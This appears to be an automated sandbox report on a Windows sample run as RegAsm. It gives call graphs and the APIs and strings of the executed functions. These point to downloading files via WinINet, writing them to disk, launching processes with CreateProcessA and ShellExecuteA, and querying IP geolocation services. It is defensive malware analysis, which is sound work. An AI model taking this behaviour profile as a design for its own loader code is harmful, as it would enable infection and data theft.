Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49263->49264 49264->49183 49265 43a694 49346 4f4600 46 API calls 3 library calls 49265->49346 49267->49247 49347 4f1460 46 API calls 3 library calls 49267->49347 49362 4eede0 46 API calls 49268->49362 49270 43b860 49271 414fd0 std::ios_base::clear 46 API calls 49270->49271 49272 43b86f 49271->49272 49273 4187e0 46 API calls 49272->49273 49274 43b892 49273->49274 49275 509bd0 70 API calls 49274->49275 49276 43b8ae 49275->49276 49277 43bf9f 49276->49277 49363 4f47f0 59 API calls 49276->49363 49278 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49277->49278 49278->49216 49280 43bf80 49374 4f1460 46 API calls 3 library calls 49280->49374 49282 43b92c 49282->49280 49283 53f1aa 3 API calls 49282->49283 49284 43b9d9 49282->49284 49286 43b9ac _Error_objects 49283->49286 49288 43ba5f 49284->49288 49366 4f57c0 46 API calls 49284->49366 49286->49284 49364 53f0da 46 API calls _Error_objects 49286->49364 49367 4f4600 46 API calls 3 library calls 49288->49367 49289 43b9cc 49365 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49289->49365 49292 43bb39 49292->49280 49368 4f4600 46 API calls 3 library calls 49292->49368 49294 43bc3d 49369 4fb6e0 46 API calls 49294->49369 49296 43bc52 49370 4f4600 46 API calls 3 library calls 49296->49370 49298 43bf69 49298->49280 49301 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49298->49301 49300 43bd20 49302 414fd0 std::ios_base::clear 46 API calls 49300->49302 49307 43bf0d 49300->49307 49301->49280 49303 43be28 49302->49303 49371 4f46f0 46 API calls 49303->49371 49305 43be34 49372 4f4600 46 API calls 3 library calls 49305->49372 49307->49298 49373 4f1460 46 API calls 3 library calls 49307->49373 49308->49100 49309->49106 49310->49112 49311->49117 49312->49082 49313->49090 49314->49103 49315->49109 49316->49115 49317->49127 49318->49137 49319->49145 49320->49126 49321->49133 49322->49147 49323->49159 49324->49166 49325->49180 49326->49185 49327->49205 49328->49229 49329->49243 49330->49253 49331->49261 49332->49170 49333->49076 49334->49156 49335->49164 49336->49179 49337->49192 49338->49200 49339->49206 49340->49210 49341->49218 49342->49201 49343->49227 49344->49248 49345->49265 49346->49267 49347->49247 49348->49132 49349->49162 49350->49188 49351->49199 49352->49207 49353->49211 49354->49219 49355->49244 49356->49254 49357->49259 49358->49263 49359->49175 49360->49238 49361->49245 49362->49270 49363->49282 49364->49289 49365->49284 49366->49288 49367->49292 49368->49294 49369->49296 49370->49300 49371->49305 49372->49307 49373->49298 49374->49277 49375 4cef10 49376 4cef2f 49375->49376 49377 53f1aa 3 API calls 49376->49377 49378 4cf04f 49376->49378 49380 4cf022 _Error_objects 49377->49380 49384 4cf0cf __aulldiv __vswprintf_s_l 49378->49384 49831 4f57c0 46 API calls 49378->49831 49380->49378 49829 53f0da 46 API calls _Error_objects 49380->49829 49382 4cf042 49830 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49382->49830 49645 50cec0 49384->49645 49386 4d0290 Concurrency::wait 49386->49386 49388 41a1e0 Concurrency::wait 46 API calls 49386->49388 49387 4cf170 __aulldiv Concurrency::wait __vswprintf_s_l 49387->49386 49387->49387 49389 41a1e0 Concurrency::wait 46 API calls 49387->49389 49393 4d1720 49388->49393 49390 4cf35a 49389->49390 49652 432880 49390->49652 49394 4d1771 49393->49394 49397 414e70 std::ios_base::clear 46 API calls 49393->49397 49400 4d1811 49394->49400 49876 4ef210 46 API calls 49394->49876 49395 4cf378 49399 414fd0 std::ios_base::clear 46 API calls 49395->49399 49396 4d16a3 49875 4ceef0 48 API calls std::ios_base::clear 49396->49875 49397->49394 49405 4cf388 49399->49405 49401 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49400->49401 49403 4d181c 49401->49403 49404 4d17b7 49877 4172e0 46 API calls ctype 49404->49877 49406 4cf3d9 49405->49406 49407 414e70 std::ios_base::clear 46 API calls 49405->49407 49409 4cf479 49406->49409 49832 4ef210 46 API calls 49406->49832 49407->49406 49410 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49409->49410 49414 4cf484 Concurrency::wait 49410->49414 49412 4cf41f 49833 4172e0 46 API calls ctype 49412->49833 49414->49414 49415 41a1e0 Concurrency::wait 46 API calls 49414->49415 49416 4cf511 49415->49416 49674 430740 49416->49674 49418 4cf516 Concurrency::wait 49418->49418 49419 41a1e0 Concurrency::wait 46 API calls 49418->49419 49420 4cf5a6 49419->49420 49742 4317e0 49420->49742 49423 53f1aa 3 API calls 49428 4cf5ce _Error_objects 49423->49428 49424 4cf5fb 49426 4cf67b 49424->49426 49836 4f57c0 46 API calls 49424->49836 49427 53f1aa 3 API calls 49426->49427 49430 4cf6d5 49426->49430 49434 4cf6a8 _Error_objects 49427->49434 49428->49424 49834 53f0da 46 API calls _Error_objects 49428->49834 49436 4cf755 Concurrency::wait 49430->49436 49839 4f57c0 46 API calls 49430->49839 49431 4cf5ee 49835 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49431->49835 49434->49430 49837 53f0da 46 API calls _Error_objects 49434->49837 49438 41a1e0 Concurrency::wait 46 API calls 49436->49438 49437 4cf6c8 49838 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49437->49838 49440 4cf7e4 49438->49440 49810 432b60 49440->49810 49878 50cce0 49645->49878 49647 50ceed __aulldiv __vswprintf_s_l 49651 50cef9 49647->49651 49898 50ca00 49647->49898 49651->49387 49653 4328d4 __aulldiv Concurrency::wait __vswprintf_s_l 49652->49653 49653->49653 49654 41a1e0 Concurrency::wait 46 API calls 49653->49654 49656 4329b2 49654->49656 49655 4329f4 49658 432a70 49655->49658 50023 4ef210 46 API calls 49655->50023 49656->49655 49657 414e70 std::ios_base::clear 46 API calls 49656->49657 49657->49655 49660 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49658->49660 49662 432a7b Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49660->49662 49661 432a31 50024 4172e0 46 API calls ctype 49661->50024 49664 54f78c 46 API calls 49662->49664 49665 432b06 49664->49665 49666 432b3a 49665->49666 49667 54fc1b 74 API calls 49665->49667 49668 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49666->49668 49670 432b1f 49667->49670 49669 432b4b 49668->49669 49669->49395 49669->49396 49671 54f66e 46 API calls 49670->49671 49672 432b2b 49671->49672 49673 54f8c8 77 API calls 49672->49673 49673->49666 49675 430760 Concurrency::wait 49674->49675 49676 41a1e0 Concurrency::wait 46 API calls 49675->49676 49677 43079c __aulldiv __vswprintf_s_l 49676->49677 49678 414fd0 std::ios_base::clear 46 API calls 49677->49678 49679 4308c0 49678->49679 49680 414e70 std::ios_base::clear 46 API calls 49679->49680 49681 430902 49679->49681 49680->49681 49682 43098a 49681->49682 50025 4ef210 46 API calls 49681->50025 49684 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49682->49684 49687 430995 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49684->49687 49685 43093f 50026 4172e0 46 API calls ctype 49685->50026 49688 54f78c 46 API calls 49687->49688 49689 430a3e 49688->49689 49690 43120c 49689->49690 49695 430a4e __aulldiv __vswprintf_s_l 49689->49695 49691 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49690->49691 49692 431218 49691->49692 49693 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49692->49693 49694 430d27 49693->49694 49694->49418 49696 55012d __fread_nolock 55 API calls 49695->49696 49697 430c44 __aulldiv __vswprintf_s_l 49696->49697 49698 430d07 49697->49698 49704 430d2f __aulldiv __vswprintf_s_l 49697->49704 49699 54f8c8 77 API calls 49698->49699 49700 430d10 49699->49700 49701 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49700->49701 49702 430d1f 49701->49702 49703 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49702->49703 49703->49694 49705 54fc1b 74 API calls 49704->49705 49706 430e1b 49705->49706 49707 54f66e 46 API calls 49706->49707 49708 430e27 __aulldiv __vswprintf_s_l 49707->49708 49709 54fc1b 74 API calls 49708->49709 49710 430fbc 49709->49710 49711 41bba0 46 API calls 49710->49711 49712 430fcd __aulldiv Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 49710->49712 49711->49712 49713 55012d __fread_nolock 55 API calls 49712->49713 49714 431136 49713->49714 49715 53f1aa 3 API calls 49714->49715 49716 431187 49714->49716 49720 43115a _Error_objects 49715->49720 49719 4311f2 49716->49719 50029 4f57c0 46 API calls 49716->50029 49718 54f8c8 77 API calls 49734 431207 __aulldiv __vswprintf_s_l 49718->49734 49719->49718 49720->49716 50027 53f0da 46 API calls _Error_objects 49720->50027 49722 43117a 50028 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49722->50028 49724 43168a Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49725 4316a1 CreateFileA 49724->49725 49726 4316b1 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49725->49726 49727 4316e5 49725->49727 49729 4316d0 WriteFile CloseHandle 49726->49729 49728 431732 49727->49728 49730 53f1aa 3 API calls 49727->49730 49732 4317b3 49728->49732 50032 4f57c0 46 API calls 49728->50032 49729->49727 49736 431705 _Error_objects 49730->49736 49733 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49732->49733 49735 4317cb 49733->49735 49734->49724 49737 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49735->49737 49736->49728 50030 53f0da 46 API calls _Error_objects 49736->50030 49739 4317d3 49737->49739 49739->49694 49740 431725 50031 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49740->50031 49743 431800 Concurrency::wait 49742->49743 49744 41a1e0 Concurrency::wait 46 API calls 49743->49744 49745 43183c __aulldiv __vswprintf_s_l 49744->49745 49746 414fd0 std::ios_base::clear 46 API calls 49745->49746 49747 431960 49746->49747 49748 4319a2 49747->49748 49749 414e70 std::ios_base::clear 46 API calls 49747->49749 49750 431a2a 49748->49750 50033 4ef210 46 API calls 49748->50033 49749->49748 49752 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49750->49752 49755 431a35 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49752->49755 49753 4319df 50034 4172e0 46 API calls ctype 49753->50034 49756 54f78c 46 API calls 49755->49756 49757 431ade 49756->49757 49758 4322ac 49757->49758 49763 431aee __aulldiv __vswprintf_s_l 49757->49763 49759 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49758->49759 49760 4322b8 49759->49760 49761 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49760->49761 49762 431dc7 49761->49762 49762->49423 49762->49424 49764 55012d __fread_nolock 55 API calls 49763->49764 49765 431ce4 __aulldiv __vswprintf_s_l 49764->49765 49766 431da7 49765->49766 49772 431dcf __aulldiv __vswprintf_s_l 49765->49772 49767 54f8c8 77 API calls 49766->49767 49768 431db0 49767->49768 49769 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49768->49769 49770 431dbf 49769->49770 49771 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49770->49771 49771->49762 49773 54fc1b 74 API calls 49772->49773 49774 431ebb 49773->49774 49775 54f66e 46 API calls 49774->49775 49776 431ec7 __aulldiv __vswprintf_s_l 49775->49776 49777 54fc1b 74 API calls 49776->49777 49778 43205c 49777->49778 49779 43206d __aulldiv Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 49778->49779 49780 41bba0 46 API calls 49778->49780 49781 55012d __fread_nolock 55 API calls 49779->49781 49780->49779 49782 4321d6 49781->49782 49783 53f1aa 3 API calls 49782->49783 49784 432227 49782->49784 49788 4321fa _Error_objects 49783->49788 49787 432292 49784->49787 50037 4f57c0 46 API calls 49784->50037 49786 54f8c8 77 API calls 49802 4322a7 __aulldiv __vswprintf_s_l 49786->49802 49787->49786 49788->49784 50035 53f0da 46 API calls _Error_objects 49788->50035 49790 43221a 49811 4150c0 std::bad_exception::bad_exception 46 API calls 49810->49811 49812 432b77 49811->49812 49813 432880 82 API calls 49812->49813 49814 432b7c Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49813->49814 49821 432bfa std::ios_base::_Ios_base_dtor 49814->49821 50041 416d40 49814->50041 49829->49382 49830->49378 49831->49384 49832->49412 49833->49409 49834->49431 49835->49424 49836->49426 49837->49437 49838->49430 49839->49436 49875->49386 49876->49404 49877->49400 49921 50c690 49878->49921 49882 50cd28 49882->49647 49883 50cd1c Concurrency::wait 49883->49882 49884 41a1e0 Concurrency::wait 46 API calls 49883->49884 49885 50cd85 49884->49885 49886 414e70 std::ios_base::clear 46 API calls 49885->49886 49887 50cdbe 49885->49887 49886->49887 49888 50ce2e 49887->49888 49930 4ef210 46 API calls 49887->49930 49889 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49888->49889 49892 50ce36 49889->49892 49891 50cdf2 49931 4172e0 46 API calls ctype 49891->49931 49893 50ce3c lstrlenA 49892->49893 49894 50ce4e 49892->49894 49896 50ce5a GetProcessHeap HeapAlloc lstrcpynA 49893->49896 49894->49896 49896->49882 49899 50ca52 _Error_objects 49898->49899 49932 50c6e0 InternetOpenA 49899->49932 49902 50cab0 49904 41e940 43 API calls 49902->49904 49903 50cac7 InternetOpenUrlA 49906 50cb2b InternetReadFile 49903->49906 49919 50cb1f 49903->49919 49911 50cabf 49904->49911 49908 50cb6a 49906->49908 49915 50cb4f 49906->49915 49907 50cc9a InternetCloseHandle 49909 50ccaa 49907->49909 49912 54f78c 46 API calls 49908->49912 49949 41e940 49909->49949 49920 50cea0 GetProcessHeap HeapFree 49911->49920 49914 50cc46 49912->49914 49914->49919 49943 54ff1a 49914->49943 49915->49906 49915->49908 49939 4f5680 49915->49939 49918 54f8c8 77 API calls 49918->49919 49919->49907 49919->49909 49920->49651 49922 50c650 CharNextA 49921->49922 49923 50c6a6 49922->49923 49924 50c650 CharNextA 49923->49924 49925 50c6ce 49924->49925 49926 50c650 49925->49926 49927 50c669 49926->49927 49928 50c681 49927->49928 49929 50c65c CharNextA 49927->49929 49928->49883 49929->49927 49930->49891 49931->49888 49934 50c74a HttpOpenRequestA HttpSendRequestA 49932->49934 49937 50c740 49932->49937 49935 50c87e GetLastError 49934->49935 49936 50c8a9 __aulldiv __vswprintf_s_l 49934->49936 49935->49936 49936->49937 49938 50c9af InternetCloseHandle 49936->49938 49937->49902 49937->49903 49938->49937 49940 4f56e6 49939->49940 49941 4f56a5 49939->49941 49953 4fc700 49940->49953 49941->49915 49944 54ff2d __vswprintf_s_l 49943->49944 49970 54fcfc 49944->49970 49946 54ff42 49947 54bc9c __vswprintf_s_l 43 API calls 49946->49947 49948 50cc85 49947->49948 49948->49918 49950 41e975 49949->49950 49951 41e9ac Concurrency::wait 49949->49951 49950->49951 50022 40dc20 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49950->50022 49951->49911 49954 4fc76e 49953->49954 49955 4fc797 49954->49955 49968 41db00 45 API calls std::bad_exception::bad_exception 49954->49968 49957 4fc7d3 49955->49957 49958 4fc7c2 49955->49958 49960 53ee6e std::_Facet_Register 17 API calls 49957->49960 49961 4fc7cb 49957->49961 49959 41d950 std::bad_exception::bad_exception 46 API calls 49958->49959 49959->49961 49960->49961 49964 501430 49961->49964 49963 4fc8ef 49963->49941 49965 501465 49964->49965 49967 50149c Concurrency::wait 49964->49967 49965->49967 49969 40dc20 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49965->49969 49967->49963 49968->49955 49969->49967 49971 54fd0a 49970->49971 49976 54fd32 49970->49976 49972 54fd17 49971->49972 49973 54fd39 49971->49973 49971->49976 49986 553e0f 29 API calls 3 library calls 49972->49986 49978 54fc55 49973->49978 49976->49946 49979 54fc61 ___unDNameEx 49978->49979 49987 550723 EnterCriticalSection 49979->49987 49981 54fc6f 49988 54fcb0 49981->49988 49985 54fc8d 49985->49946 49986->49976 49987->49981 49996 55cff0 49988->49996 49994 54fc7c 49995 54fca4 LeaveCriticalSection __fread_nolock 49994->49995 49995->49985 50013 55cfb2 49996->50013 49998 54fcc8 50003 54fd73 49998->50003 49999 55d001 49999->49998 50020 55b45b 15 API calls 3 library calls 49999->50020 50001 55d05a 50002 55b421 ___std_exception_copy 14 API calls 50001->50002 50002->49998 50005 54fd85 50003->50005 50007 54fce6 50003->50007 50004 54fd93 50021 553e0f 29 API calls 3 library calls 50004->50021 50005->50004 50005->50007 50010 54fdc9 ctype 50005->50010 50012 55d09b 72 API calls 50007->50012 50008 5539e8 72 API calls 50008->50010 50009 55cf76 __fread_nolock 43 API calls 50009->50010 50010->50007 50010->50008 50010->50009 50011 55923a 72 API calls 50010->50011 50011->50010 50012->49994 50014 55cfbe 50013->50014 50015 55cfe8 50014->50015 50016 55cf76 __fread_nolock 43 API calls 50014->50016 50015->49999 50017 55cfd9 50016->50017 50018 562150 __fread_nolock 43 API calls 50017->50018 50019 55cfdf 50018->50019 50019->49999 50020->50001 50021->50007 50022->49951 50023->49661 50024->49658 50025->49685 50026->49682 50027->49722 50028->49716 50029->49719 50030->49740 50031->49728 50032->49732 50033->49753 50034->49750 50035->49790 50037->49787 50042 416d56 50041->50042

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 004CEF10 Relevance: 68.8, APIs: 16, Strings: 22, Instructions: 2340sleepprocessCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004CF133
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                    • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004CF26D
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000000C8,?,?,?), ref: 004CFB61
                                                                                                                                                                                                                                  • Sleep.KERNEL32(?), ref: 004CFB8A
                                                                                                                                                                                                                                  • GetBinaryTypeA.KERNEL32(00000000,FFFFFFFF), ref: 004CFBB4
                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,?,?,00000000,00000000,?), ref: 004D0070
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 004D0081
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 004D008E
                                                                                                                                                                                                                                  • GetBinaryTypeA.KERNEL32(?,FFFFFFFF,?), ref: 004D02B0
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000000C8), ref: 004D04AD
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 004D04D6
                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,?,?,00000000,00000000,?), ref: 004D0999
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004D09AA
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004D09B7
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004D1307
                                                                                                                                                                                                                                  • ShellExecuteA.SHELL32(00000000,?,?,?,00000000,?), ref: 004D14AC
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv$CloseExclusiveHandleLockSleep$AcquireBinaryCreateProcessReleaseType$ConditionExecuteShellVariableWake
                                                                                                                                                                                                                                  • String ID: !jwj$$$($)$.$6|tt$B$B$D$D$E$E$J$K$M$M$M$P$eks$j3l6lrek$mOA$v
                                                                                                                                                                                                                                  • API String ID: 469071346-4142521700
                                                                                                                                                                                                                                  • Opcode ID: 2e3229649e2c502acff95ee40dbe19fd784d531f28602a3db6b28b707dd295d8
                                                                                                                                                                                                                                  • Instruction ID: 25b4dd716968d004817c252c2393c646fb2409f2773173bf43e65d163309b470
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e3229649e2c502acff95ee40dbe19fd784d531f28602a3db6b28b707dd295d8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B4335709042688FDB25CB64CC94BEEBBB1BF49304F0481EAD54967381DB386E89CF59
                                                                                                                                                                                                                                  Function 00437B10 Relevance: 47.1, APIs: 2, Strings: 23, Instructions: 3321COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: *NK^K$-NN$/$/F_$4]D$@$B&#6#$Content-Type: application/x-www-form-urlencoded$I-(=($S72'2$S=2>6$e`u`$https://ipgeolocation.io/$https://ipinfo.io/$k$k$k$kn{n$lcog$p$r$|$|
                                                                                                                                                                                                                                  • API String ID: 0-3284807517
                                                                                                                                                                                                                                  • Opcode ID: 3f213231d5d232202ef51274de070b1f38cdaa60b191c0497d14babc0837d4d2
                                                                                                                                                                                                                                  • Instruction ID: c7d5bd5d44397f905c05e8a6ae4fdd4f8a32e3fdcd9d0a3d97fe4df541a22c15
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f213231d5d232202ef51274de070b1f38cdaa60b191c0497d14babc0837d4d2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04830370D052A88FDB25CB28CC94BEEBBB1AF89304F0481DAD54967242CB796F85CF55
                                                                                                                                                                                                                                  Function 00451720 Relevance: 42.7, APIs: 2, Strings: 21, Instructions: 2466COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID: %$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:::
                                                                                                                                                                                                                                  • API String ID: 3732870572-4246453620
                                                                                                                                                                                                                                  • Opcode ID: e0c81232448cc281b27eaa4bb2f3d9dbc8d09e33c9e92427b5f09304b7325cc7
                                                                                                                                                                                                                                  • Instruction ID: f115d8c10725fef486f73ebf3abac10adfbb27f38f5e9dcadf0ac8c245414fd8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0c81232448cc281b27eaa4bb2f3d9dbc8d09e33c9e92427b5f09304b7325cc7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 474338709042688BCB25DF25CC91BEEBBB5AF45309F0441DED54AAB242DB346F88CF59
                                                                                                                                                                                                                                  Function 00430740 Relevance: 29.2, APIs: 13, Strings: 3, Instructions: 1186COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2177 430740-43076d call 41b910 2180 430770-430780 2177->2180 2180->2180 2181 430782-4308cd call 41a1e0 call 5672b0 call 567190 call 414fd0 2180->2181 2190 430904-43090c call 41bb40 2181->2190 2191 4308cf-4308d6 2181->2191 2196 430911-430918 2190->2196 2192 4308e1 2191->2192 2193 4308d8-4308df 2191->2193 2195 4308e8-4308ee 2192->2195 2193->2195 2195->2190 2197 4308f0-430902 call 414e70 2195->2197 2198 430923 2196->2198 2199 43091a-430921 2196->2199 2197->2196 2200 43092a-430930 2198->2200 2199->2200 2202 430932-43094c call 4ef210 2200->2202 2203 43098a-4309b1 call 417140 2200->2203 2209 430952-430962 2202->2209 2210 4309bc-4309c0 2203->2210 2209->2209 2211 430964-430985 call 4172e0 2209->2211 2212 4309c2-4309f7 2210->2212 2213 4309f9-430a48 call 414d00 call 54f78c 2210->2213 2211->2203 2212->2210 2220 430a4e-430c3f call 5672b0 * 2 call 41fb00 call 5672b0 call 567190 call 5672b0 * 2 call 41fb00 call 55012d 2213->2220 2221 43120c-431223 call 417140 * 2 2213->2221 2244 430c44-430cf7 call 5672b0 * 3 call 567190 call 41fbd0 2220->2244 2230 4317d6-4317dc 2221->2230 2255 430d07-430d2a call 54f8c8 call 417140 * 2 2244->2255 2256 430cf9-430d05 2244->2256 2255->2230 2256->2255 2257 430d2f-430fcb call 5672b0 * 2 call 41fb00 call 5672b0 * 3 call 567190 call 41fbd0 call 54fc1b call 54f66e call 5672b0 call 567190 call 5672b0 * 2 call 41fb00 call 54fc1b 2256->2257 2296 430fdb-430fe7 call 41bba0 2257->2296 2297 430fcd-430fd9 call 41bb40 2257->2297 2301 430fec-43114e call 5672b0 call 567190 call 414d00 call 55012d 2296->2301 2297->2301 2310 431150-431164 call 53f1aa 2301->2310 2311 43118a-4311a2 2301->2311 2310->2311 2320 431166-431187 call 41f450 call 53f0da call 53f159 2310->2320 2312 4311f4-4311f9 call 4ee6c0 2311->2312 2313 4311a4-4311f2 call 4fb3b0 call 4f57c0 2311->2313 2319 4311fe-4313fc call 54f8c8 call 414e10 call 5672b0 * 2 call 41fb00 call 414e10 call 4ef310 call 5672b0 * 3 call 567190 call 41fbd0 call 5672b0 * 2 call 41fb00 2312->2319 2313->2319 2361 431402-431413 call 414d50 2319->2361 2362 431560-4315bf call 5672b0 * 2 call 41fb00 2319->2362 2320->2311 2367 431415-431424 call 414d50 2361->2367 2368 431429-43143b call 414d50 2361->2368 2382 4315ca-4315d0 2362->2382 2376 43155b 2367->2376 2377 431451-431463 call 414d50 2368->2377 2378 43143d-43144c call 414d50 2368->2378 2376->2362 2388 431465-431474 call 414d50 2377->2388 2389 431479-43148b call 414d50 2377->2389 2378->2376 2385 4315d6-431685 call 5672b0 * 3 call 567190 call 41fbd0 call 414d50 2382->2385 2386 43168a-4316af call 414d00 CreateFileA 2382->2386 2385->2382 2398 4316b1-4316df call 414d00 WriteFile CloseHandle 2386->2398 2399 4316e5-4316f9 2386->2399 2388->2376 2402 4314a1-4314b3 call 414d50 2389->2402 2403 43148d-43149c call 414d50 2389->2403 2398->2399 2404 431735-43174d 2399->2404 2405 4316fb-43170f call 53f1aa 2399->2405 2423 4314b5-4314c4 call 414d50 2402->2423 2424 4314c9-4314db call 414d50 2402->2424 2403->2376 2411 4317b5-4317ba call 4ee6c0 2404->2411 2412 43174f-4317b3 call 4f57c0 2404->2412 2405->2404 2422 431711-431732 call 41f450 call 53f0da call 53f159 2405->2422 2420 4317bf-4317d3 call 417140 * 2 2411->2420 2412->2420 2420->2230 2422->2404 2423->2376 2438 4314ee-431500 call 414d50 2424->2438 2439 4314dd-4314ec call 414d50 2424->2439 2449 431513-431525 call 414d50 2438->2449 2450 431502-431511 call 414d50 2438->2450 2439->2376 2457 431527-431536 call 414d50 2449->2457 2458 431538-43154a call 414d50 2449->2458 2450->2376 2457->2376 2458->2376 2463 43154c-431558 call 414d50 2458->2463 2463->2376
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0043088A
